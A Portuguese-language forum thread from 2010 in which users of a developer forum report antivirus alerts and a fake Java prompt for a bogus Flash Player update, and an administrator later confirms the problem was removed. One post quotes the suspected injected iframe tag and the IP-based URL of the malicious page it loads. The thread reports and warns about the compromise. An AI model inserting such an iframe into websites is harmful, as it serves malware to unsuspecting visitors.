Elektra 102 Denunciar post Postado Dezembro 12, 2010 Há mais de uma semana não tenho nenhuma tag disponível, tenho inserido codes à mão. Até aí tudo bem, a gente se vira. Bugs em alguns posts e conteúdo deletado, inclusive postado por um dos administradores no fórum de Entretenimento. Nos últimos 2 ou 3 dias o Firefox apresenta muitos travamentos ao acessar links aqui no fórum. Enviei relatórios e instalei a atualização de segurança ontem. Hoje, tive vários alertas de vírus, ao acessar páginas diversas. outros: às 22:53 - Fórum Flash às 22:55 - na index Tópico para informar e conferir se outros colegas notaram algo semelhante. Compartilhar este post Link para o post Compartilhar em outros sites
netocostajr 0 Denunciar post Postado Dezembro 12, 2010 A situação esta critica realmente, tenho aqui recebido diversos alertas de erros em java, que enchem o saco, estava até procurando uma área aonde eu pudesse relatar o ocorrido, mas como encontrei este tópico, fica aqui meu relato de problemas encarados com o fórum. Compartilhar este post Link para o post Compartilhar em outros sites
Anderson Ferminiano 2 Denunciar post Postado Dezembro 12, 2010 Tive alguns problemas com chrome alertando de "Plugin Java com erro, ou problemas inesperados" algo assim também esses dias no iMasters. Apenas no windows, no Mac não tive problemas. Compartilhar este post Link para o post Compartilhar em outros sites
Elektra 102 Denunciar post Postado Dezembro 12, 2010 Uso mais o Firefox, mas fui conferir pelo Chrome, situação idêntica >> Clique aqui Hoje, ao acessar outro site pelo IE8, alerta do Java para instalar o FlashPlayer 12, mas no site da Adobe a versão mais atualizada é a 10.1.102.64 (absurdo, pois tenho instalado o Flash CS5 licenciado e esta versão recebe atualizações direto pela Adobe) >> Java Falso Adobe Flash Player oficial >> versão 10.1.102.64 Bem diferente de sites que solicitam a instalação de java applet legítimos, a página informa sobre isso, e o nome do próprio site é identificado na origem >> Java applet Verdadeiro Pode até não ser nada, mas fica para informação de outros colegas. Compartilhar este post Link para o post Compartilhar em outros sites
RafaelSonyLock 18 Denunciar post Postado Dezembro 12, 2010 Por aqui, NOD 32 e Norton Internet Security 2011 sem problemas ! Compartilhar este post Link para o post Compartilhar em outros sites
FoxPro 0 Denunciar post Postado Dezembro 13, 2010 Url utilizada em vários possíveis ataques: 109.232.225.83/img/s.html Submeta a mesma a busca do site VirusTotal http://www.virustotal.com/search.html E os resultados falaram por si. Forma que é usada: <iframe src="109.232.225.83/img/s.html"> Compartilhar este post Link para o post Compartilhar em outros sites
RafaelSonyLock 18 Denunciar post Postado Dezembro 13, 2010 Resultado Norton Safe Web http://safeweb.norton.com/report/show?url=http://forum.imasters.com.br/ Compartilhar este post Link para o post Compartilhar em outros sites
João Prado 64 Denunciar post Postado Dezembro 14, 2010 Já pensaram na possibilidade de ser algo no computador de vocês? Até agora não tive problemas e só vocês que alertaram. De qualquer forma, obrigado por nos avisar. Abraços João Prado Compartilhar este post Link para o post Compartilhar em outros sites
netocostajr 0 Denunciar post Postado Dezembro 14, 2010 O problema só ocorre aqui no fórum, basta fazer a mudança de páginas que ao começar a carregar da este aviso, em nenhum outro site ocorre este problema, ao que me parece é o mesmo que estava ocorrendo a um tempo atrás, inclusive a outros tópicos criados em relação a isso portanto não é novidade. Ao que parece hoje esta tudo normal, não recebi nenhum alerta. Compartilhar este post Link para o post Compartilhar em outros sites
Elektra 102 Denunciar post Postado Dezembro 14, 2010 Já pensaram na possibilidade de ser algo no computador de vocês? Por favor João Prado, o site é muito visado e o que não falta é gente mal intencionada. Já vi situação idêntica no Yahoo faz algum tempo. Compartilhar este post Link para o post Compartilhar em outros sites
FoxPro 0 Denunciar post Postado Dezembro 19, 2010 This is a iframe Para visualiza-lo basta estar deslogado da sua conta :) Compartilhar este post Link para o post Compartilhar em outros sites
Elektra 102 Denunciar post Postado Dezembro 23, 2010 Apenas para informar, detecção hoje: hoje à tarde hoje à noite Pode até ser um iframe, mas não é habitual este tipo de mensagem do KIS. ps: meu PC vai muito bem obrigada Compartilhar este post Link para o post Compartilhar em outros sites
FoxPro 0 Denunciar post Postado Dezembro 23, 2010 Apenas para informar, detecção hoje: hoje à tarde hoje à noite Pode até ser um iframe, mas não é habitual este tipo de mensagem do KIS. ps: meu PC vai muito bem obrigada Teria como você disponibilizar a url que o Kaspersky bloqueia, através dela posso traçar uma rota e determinar de onde esta vindo o ataque. Compartilhar este post Link para o post Compartilhar em outros sites
João Batista Neto 448 Denunciar post Postado Dezembro 23, 2010 O problema foi identificado e a remoção já está sendo providenciada pessoal. ;) EDIT: Problema resolvido. Compartilhar este post Link para o post Compartilhar em outros sites
Elektra 102 Denunciar post Postado Dezembro 24, 2010 Beleza pura! :clap: FoxPro >> Clique aqui (sou apenas uma usuária do fórum, interessada no bem comum, relatando um fato) Compartilhar este post Link para o post Compartilhar em outros sites